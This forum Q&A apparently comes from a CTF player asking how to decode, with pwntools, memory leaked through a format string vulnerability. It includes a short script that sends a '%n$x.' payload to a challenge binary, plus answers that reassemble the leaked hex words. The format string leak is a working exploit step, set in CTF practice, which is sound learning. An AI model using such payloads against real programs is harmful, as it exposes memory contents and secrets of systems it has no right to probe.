
I've been learning the pwntools Python library and using it to build solutions to CTF challenges. One thing I keep running into is that, after a successful exploit (say of a format string vulnerability) where I get the program to leak the memory I want, it's a pain to format the output in such a way as to easily read the flag.

This feels like something that there is a one-liner inside of pwntools to address, but I have not been able to find it.

My current solution (which works) seems like it's harder than it needs to be, so I'm hoping I'm just blind and missing the one-liner I suspect is there.

Here is what I'm doing now:

from pwn import *  # provides unhex(), pack(), process()/remote()

r = process('./target')  # placeholder: the challenge binary (or remote(host, port))
payload = b''            # the question omits how payload starts; begin empty here

# ask the format string to print stack slots 32..47 as hex, '.'-separated
for n in range(32, 32+16):
    payload += b"%" + str(n).encode() + b"$x."

r.send(payload)
r.send(b"\n")

# disregard one line
r.recvline()

# this is where I get my memory leak, in the form of hex numbers separated by '.'
data = r.recvline()

dataBytes = data.strip().split(b'.')

answer = b''
for db in dataBytes:
    if not db:
        # the trailing '.' leaves an empty element; nothing to decode
        continue

    # pad the bytes to full width
    while len(db) < 8:
        db = b'0' + db

    # %x prints the most significant nibble first, so the hex text is big-endian
    i = int.from_bytes(unhex(db), byteorder="big")
    answer += pack(i, endian="little")

print(answer)

1 Answer

You actually don't need to pad the hex to 8 characters first. int(x, 16) will handle short hex just fine.

For example, if you know you're leaking 64-bit values:

from pwn import *  # p64() / p32()

data = r.recvline().strip().split(b'.')
# skip the empty element the trailing '.' leaves behind; int() rejects b''
answer = b''.join(p64(int(x, 16)) for x in data if x)
print(answer)

If you're on a 32-bit challenge, just swap in p32.


1 Comment

That helps. I did find I needed to add a [:-1] to the end of the first line, as the split left me with a trailing b'' which int() doesn't like.
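A stand-alone version of the decoding step discussed in the answer and the comment, added here as an example rather than code from the question or the answer. It builds a constructed leak line of the form `%n$x.` output produces (bare hex words, no leading zeros, a trailing empty field), decodes it with `int(tok, 16)` while skipping the empty token, and uses `struct.pack('<I')` / `struct.pack('<Q')` in place of pwntools' `p32` / `p64` so it runs without pwntools installed. The flag value and the helper names are made up for the example.

```python
import re
import struct

# pwntools p32()/p64() are struct.pack('<I')/('<Q') on a little-endian
# target; struct is used here so the example runs without pwntools.
WORD_FMT = {4: '<I', 8: '<Q'}


def make_sample_leak(flag: bytes, word_size: int = 4) -> bytes:
    """Constructed sample: what a '%n$x.' style leak of stack words that
    hold `flag` looks like. %x prints each word as bare hex with no leading
    zeros, so short tokens such as '7d' are normal, and the last '.' leaves
    a trailing empty field before the newline."""
    padded = flag + b'\x00' * (-len(flag) % word_size)
    fmt = WORD_FMT[word_size]
    words = [struct.unpack(fmt, padded[i:i + word_size])[0]
             for i in range(0, len(padded), word_size)]
    return ''.join('%x.' % w for w in words).encode() + b'\n'


def leak_to_bytes(line: bytes, word_size: int = 4) -> bytes:
    """Turn one leaked line back into the raw memory it came from.
    int(tok, 16) accepts short hex, so no zero padding is needed; empty
    tokens (from the trailing '.') are skipped because int() rejects b''."""
    fmt = WORD_FMT[word_size]
    out = b''
    for tok in line.strip().split(b'.'):
        if not tok:
            continue
        out += struct.pack(fmt, int(tok, 16))
    return out


def find_flag(blob: bytes) -> bytes:
    """Pull a flag{...} token out of reconstructed memory; b'' if absent."""
    m = re.search(rb'flag\{[^}]*\}', blob)
    return m.group(0) if m else b''


if __name__ == '__main__':
    for ws in (4, 8):
        line = make_sample_leak(b'flag{pwn}', ws)
        print(ws * 8, 'bit leak:', line, '->', find_flag(leak_to_bytes(line, ws)))
```

With pwntools available, `struct.pack(WORD_FMT[4], v)` and `struct.pack(WORD_FMT[8], v)` are exactly `p32(v)` and `p64(v)`; the `if not tok` guard is what the comment's `[:-1]` achieves, but it also survives a leak line that happens to contain consecutive dots.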
